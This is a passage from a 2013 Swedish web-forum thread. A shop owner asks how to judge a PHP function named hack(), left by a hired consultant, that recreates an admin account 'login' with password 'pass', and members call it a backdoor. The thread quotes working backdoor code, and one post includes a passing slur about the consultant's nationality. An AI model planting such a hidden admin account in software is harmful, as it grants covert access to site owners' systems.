WN
Sidan 1 av 5 1 23 Sista »
Visa 40 inlägg från det här ämnet på en sida

WN (https://www.wn.se/forum/index.php)
-   E-kommers (https://www.wn.se/forum/forumdisplay.php?f=10)
-   -   Hur skulle ni reagera om en konsult gjorde en sån här kod? (https://www.wn.se/forum/showthread.php?t=1057675)

xciso 2013-04-22 15:38
Hur skulle ni reagera om en konsult gjorde en sån här kod?
 
Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig.
Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng:

Kod:
        public function hack() {
                $this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'");
                $this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1");
        }
Hur skulle ni tolka detta?
Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag..

Wojt 2013-04-22 15:42
Haha.

Hade avbrutit samarbetet omgående.

Ger inte någon utvecklare tillgång till live-servrar, de måste lära sig jobba i en lokal miljö och sedan pusha kod till typ git. Ligger det då sådan kod för att få tillgång till livemiljön så kan de gå och jobba någon annanstans.

lunarmys 2013-04-22 15:48
Haha, humor!

Eller ja, idioti, men för oss utomstående så är det lite komiskt.

Westman 2013-04-22 15:57
Avsluta samarbetet. Det där är så fel som det kan bli.

gregoff 2013-04-22 16:07
Nu vet jag inte hur mycket programmering i PHP du kan, xciso, men vad koden gör är att nollställa lösenordet till användaren "login" med lösenordet "pass".

Med andra ord fanns det funktionalitet för att logga in i ditt system utan din vetskap även om du bytt lösenord... Rätt allvarligt övertramp!

xciso 2013-04-22 16:12
Mitt system är av open-source, och detta gör mig lite rädd att det faktiskt var så enkelt.

Koden skapar ju först ett admin konto med användarnamn "login"

Jag håller på och sätter upp en ny version av sidan så jag har satt upp en VPS där jag gör allt och tanken var att sedan bara skifta ip så styrs min URL mot nya servern. På så sätt är det en "live" version..

Jawn 2013-04-22 16:41
Svårt att smyga med ett sådant namn på funktionen.

xciso 2013-04-22 16:45
Konsulten tycker jag är paranoid, men jag ser mer som att han kan ligga och lura med koden i mitt system och om ett år gå in och ändra mitt tex paypal id till hans och på så sätt komma åt en bra summa då alla köp hamnar i hans plånbok..

Han har även utvecklat ett flertal moduler, och visst skulle ha då istället kunna implementera denna kod i alla moduler han säljer och utvecklar, men jag tycker ändå detta är skumt.

Westman 2013-04-22 16:52
Nej du är inte paranoid. Det verkar som om konsulten anser att alla som inte är godtrogna är paranoida. I så fall är jag hellre paranoid.

xciso 2013-04-22 16:55
Då är vi 2 :D
Dock lite tråkigt när jag tycker han verkat reko, och är billig.
Han är från Tjeckien, vilket kanske inte gör saken bättre.. Dock är priset på $20/h bra :)


Alla tider är GMT +2. Klockan är nu 22:08.
Sidan 1 av 5 1 23 Sista »
Visa 40 inlägg från det här ämnet på en sida

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson